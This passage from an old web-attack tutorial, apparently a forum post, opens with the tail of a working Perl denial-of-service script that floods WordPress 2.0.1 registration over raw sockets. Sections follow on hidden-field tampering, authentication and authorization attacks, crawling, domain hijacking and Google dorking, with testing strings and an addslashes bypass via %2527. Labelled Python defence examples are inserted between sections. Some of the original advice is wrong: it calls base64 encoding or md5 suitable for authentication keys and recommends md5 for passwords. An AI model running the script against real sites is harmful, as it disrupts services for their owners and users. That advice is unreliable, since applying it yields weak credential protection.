$user="\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x66\x6f\x6f".$rand.$i; #you N33d t0 be l33t t0 s33 th!S !
$data = "action=register&user_login=$user&user_email=$user\@matrix.org&submit=Register+%C2%BB";
$len = length $data;
$foo = "POST ".$dir."wp-register.php HTTP/1.1\r\n".
"Accept: */*\r\n".
"Accept-Language: en-gb\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Accept-Encoding: gzip, deflate\r\n".
"User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)\r\n".
"Host: $host\r\n".
"Content-Length: $len\r\n".
"Connection: Keep-Alive\r\n".
"Cache-Control: no-cache\r\n\r\n".
"$data";
my $port = "80";
my $proto = getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto);
connect(SOCKET, sockaddr_in($port, inet_aton($host))) || redo;
send(SOCKET,"$foo", 0);
syswrite STDOUT, "+";
}
#s33 if the server is down
print "\n\n";
system('ping $host');
sub usage {
print "\n\t(W)ordpress 2.0.1 ®emote (D)oS (E)xploit (y matrix_killer\n";
print "\te-mail: matrix_k\@abv.bg\n";
print "\tusage: \n";
print "\t$0 \n";
print "\tex: $0 127.0.0.1 /woredpress/\n";
print "\tex2: $0 127.0.0.1 / (if there isn't a dir)\n";
exit();
};
#Wordpress answer:
#A) DOS shouldn't be handled by a PHP application, there are much more efficient and better ways to deal with this. Registration is off by default, so the severity of this sort of DOS is rather low.
#Well I like giving my own patches or security solutions when I find a bug but this time I agree with the wordpress developers
f)Response
Server crash, service crash, almost impossible to move your mouse
23.)Hidden field manipulation
a)Description
Hidden fields are used to send the server a value that the user is not supposed to edit. But if the user views the HTML source he will see the hidden field and can change it.
b)Impact
A remote attacker can change the values for different products (if we are talking about a shop or something similar) or cause a server crash.
c)Recommendation
Make a function that accepts no value other than the one the server put in the hidden field.
d)References
http://www.securityfocus.com/infocus/1704 -> "Penetration Testing for Web Applications (Part One)" by Jody Melbourne and David Jorm
e)Testing string/s
The attacker sees this and saves the HTML on his hard drive. From then on he just changes the value 7.10 to, let's say, 2.
f)Response
200 OK, acceptance of the value by the server
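An added example, not part of the original post, of one way to build the check recommended above: the server signs the hidden fields with an HMAC when it renders the form and verifies that signature on submission, so a price changed from 7.10 to 2 is rejected. The secret key is generated at import time here as a placeholder; a deployment would load a fixed key from configuration.

```python
import hashlib
import hmac
import html
import json
import secrets

SECRET_KEY = secrets.token_bytes(32)   # assumed: load a fixed per-deployment key from config


def sign_fields(fields, key=SECRET_KEY):
    """HMAC over a canonical encoding of every hidden field, so changing any
    value (or adding/removing a field) invalidates the signature."""
    canonical = json.dumps(fields, sort_keys=True, separators=(",", ":")).encode()
    return hmac.new(key, canonical, hashlib.sha256).hexdigest()


def render_hidden_fields(fields, key=SECRET_KEY):
    """Hidden inputs for the form, plus one 'sig' input carrying the signature."""
    inputs = ['<input type="hidden" name="%s" value="%s">'
              % (html.escape(k, True), html.escape(v, True))
              for k, v in sorted(fields.items())]
    inputs.append('<input type="hidden" name="sig" value="%s">' % sign_fields(fields, key))
    return "\n".join(inputs)


def accept_submission(submitted, key=SECRET_KEY):
    """Server-side check: the posted fields are accepted only if they still
    match the signature the server produced when it rendered the form."""
    fields = {k: v for k, v in submitted.items() if k != "sig"}
    signature = str(submitted.get("sig", "")).encode()
    if not hmac.compare_digest(sign_fields(fields, key).encode(), signature):
        raise ValueError("hidden field tampered with")
    return fields
```

For a shop the simpler and stronger fix is not to send the price at all: send the product id and look the price up server-side. Signing is for hidden fields that genuinely must round-trip through the client.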
24.)Authentication attacks
a)Description
Authentication plays a very important role in security. We use it to identify someone by a special value, cookie, session or something like that.
b)Impact
If an attacker brute-forces or somehow obtains the unique identification value of the person he wants, he can authenticate as that person.
c)Recommendation
*Use SSL on your sites
*When a user logs in, his cookie (or whatever the identifier is) has to be unique and used only once. That means that when he logs out the cookie has to be destroyed, and the next time a new one should be created
*Authentication keys should be long and encrypted. Use base64 encoding or md5 hashing
*It would be good to have an IP logging function
*Authorization should be required to prevent spoofing/hijacking attacks
d)References
http://www.acunetix.com/websitesecurity/authentication.htm -> "Authentication Hacking Attacks" by Acunetix
http://www.iss.net/security_center/advice/...ing/default.htm -> "Spoofing papers" by Internet Security Systems
http://en.wikipedia.org/wiki/Spoofing_atta...ng_and_phishing -> "Spoofing attack" by Wikipedia
http://www.cs.princeton.edu/sip/WebSpoofing/ -> "Web Spoofing" by Department of Computer Science
http://en.wikipedia.org/wiki/Hijacking -> "Hijacking" by Wikipedia
e)Testing string/s
http://leet.com/login.php?id=4256467
If an account with id 4256467 exists, you will be logged in.
f)Response
200 OK, successful authentication
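An added example, not from the original post, serving two recommendations at once: the "new session ID with each login" fix for session fixation in section 14, and the "unique, used only once, destroyed on logout" rule in section 24. The store never adopts an identifier the client presents; ids exist only if the server minted them, and login always mints a fresh one. The in-memory dict is a stand-in for whatever session storage the application uses.

```python
import secrets


class SessionManager:
    """Server-side session store that never adopts a client-supplied identifier:
    ids exist only if this object minted them, and login always mints a new one."""

    def __init__(self):
        self._sessions = {}   # session id -> {"user": name or None}

    def new_session(self):
        """Anonymous session for a fresh visitor."""
        sid = secrets.token_hex(16)   # 128 random bits: not guessable, not enumerable
        self._sessions[sid] = {"user": None}
        return sid

    def login(self, presented_sid, user):
        """Regenerates the id on authentication. Whatever id the client arrived
        with (possibly one an attacker fixed in advance) is discarded, so a
        fixation attempt never ends up bound to the logged-in user."""
        self._sessions.pop(presented_sid, None)
        new_sid = secrets.token_hex(16)
        self._sessions[new_sid] = {"user": user}
        return new_sid

    def user_for(self, sid):
        session = self._sessions.get(sid)
        return session["user"] if session else None

    def logout(self, sid):
        """Destroys the session; the id is never reused."""
        self._sessions.pop(sid, None)
```

The random, server-minted id is also what closes the "login.php?id=4256467" case in the testing string above: an identifier that is a small sequential number can be enumerated, a 128-bit random one cannot.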
25.)Authorization attacks
a)Description
While authentication requires a unique value, authorization requires a username/password value.
b)Impact
If an attacker has the username/password value he can log in as the user
c)Recommendation
*Passwords should be long and complex: at least 14 characters, containing at least 5-6 special symbols from the keyboard
*Log IPs that make 6 unsuccessful login tries and ban them for 5-10 minutes
*Use md5 hashing
*Use SSL
d)References
http://www.acunetix.com/websitesecurity/authentication.htm -> "Authentication Hacking Attacks" by Acunetix
e)Testing string/s
From there the attacker just tries different username and password combinations to log in
f)Response
200 OK, acceptance of the username and password by the server
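An added example, not part of the original post, implementing the per-IP lockout recommended here (6 failed logins, ban for 5-10 minutes) and in section 22 (3-4 repeated requests, same ban window) with one throttle class, plus the password policy above. The limits are parameters so the same code serves both; the clock is injectable so the tests do not have to wait.

```python
import time
from collections import defaultdict

SPECIAL = set("!\"#$%&'()*+,-./:;<=>?@[\\]^_`{|}~")   # printable ASCII punctuation


class IpThrottle:
    """Counts events per IP inside a sliding window; reaching `limit` events
    bans the IP for `ban_seconds` and records it in `log`. The same class
    serves both uses on the page: repeated requests and failed logins."""

    def __init__(self, limit, window_seconds, ban_seconds, clock=time.monotonic):
        self.limit = limit
        self.window = window_seconds
        self.ban = ban_seconds
        self.clock = clock                     # injectable so it can be tested without waiting
        self._events = defaultdict(list)       # ip -> timestamps of recent events
        self._banned_until = {}                # ip -> time the ban expires
        self.log = []                          # (time, ip) of every ban issued

    def allowed(self, ip):
        return self._banned_until.get(ip, 0.0) <= self.clock()

    def record(self, ip):
        """Registers one event (a request, or one failed login attempt).
        Returns False if the IP is banned after this event."""
        now = self.clock()
        if not self.allowed(ip):
            return False
        recent = [t for t in self._events[ip] if now - t < self.window]
        recent.append(now)
        self._events[ip] = recent
        if len(recent) >= self.limit:
            self._banned_until[ip] = now + self.ban
            self.log.append((now, ip))
            del self._events[ip]
            return False
        return True


def password_ok(password, min_len=14, min_special=5):
    """The page's policy: at least 14 characters and at least 5 special symbols."""
    specials = sum(1 for c in password if c in SPECIAL)
    return len(password) >= min_len and specials >= min_special
```

Keying on the client IP alone will also lock out everyone behind a shared proxy; a per-account counter alongside the per-IP one is the usual refinement.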
26.)Web pilfering/crawling
a)Description
This attack searches a whole site, or parts of it, for password files, hidden fields and other sensitive information.
b)Impact
An attacker could get a lot of information about a site and even passwords
c)Recommendation
*Don't hide sensitive data in html
*Check your logs for multiple GET requests
d)References
http://en.wikipedia.org/wiki/Web_crawler -> "Web crawler" by Wikipedia
http://en.wikipedia.org/wiki/Distributed_web_crawling -> "Distributed web crawling" by Wikipedia
e)Testing string/s
GET /the_html_document.html
.....
f)Response
200 OK, hidden info
27.)Domain Hijacking
a)Description
This attack is used to take over domain names
b)Impact
An attacker could steal a domain name and then use it for phishing scams.
c)Recommendation
See the links below
d)References
http://ccpower.info/dhijacking.html#start -> "Domain Hijacking: A step-by-step guide" by CCpower
http://en.wikipedia.org/wiki/Domain_hijacking -> "Domain hijacking" by Wikipedia
e)Testing string/s
See http://ccpower.info/dhijacking.html#start
f)Response
Changed domain settings
28.)Google
a)Description
Google attacks are based on already known holes: search queries locate the pages that expose them.
b)Impact
It depends on the hole
c)Recommendation
Remove all pages identified by Google hacking queries
d)References
http://ihackgoogle.com -> Google Hacking Database (GHDB)
http://www.acunetix.com/websitesecurity/google-hacking.htm -> "Google hacking" by Acunetix
e)Testing string/s
inurl:passwd.txt site:yoursite.com
f)Response
200 OK
Final words:
As you can see, in almost all of the attacks the best solution is to allow only a-zA-Z0-9 characters. There are other types of protection too, but they can be bypassed; as an example, addslashes can be bypassed with %2527. If you are worried about how much time it will cost you to scan your site for all these attacks, you could use some of the following scanners:
Acunetix(http://www.acunetix.com/)
MaxPatrol(http://www.maxpatrol.com/)
Nikto(http://www.cirt.net/code/nikto.shtml)
Nessus(http://www.nessus.org/)
WebInspect(http://www.spidynamics.com/products/webinspect/)
Shadow Security Scanner(http://www.safety-lab.com/en/products/1.htm)
GFI LANguard(http://www.gfi.com/lannetscan/)
Typhon(http://www.ngssoftware.com/products/internet-security/ngs-typhon.php)
Greets: Bl0od3r, EcLiPsE, Acid_BDS, Alpha-fan and everyone from h4cky0u.org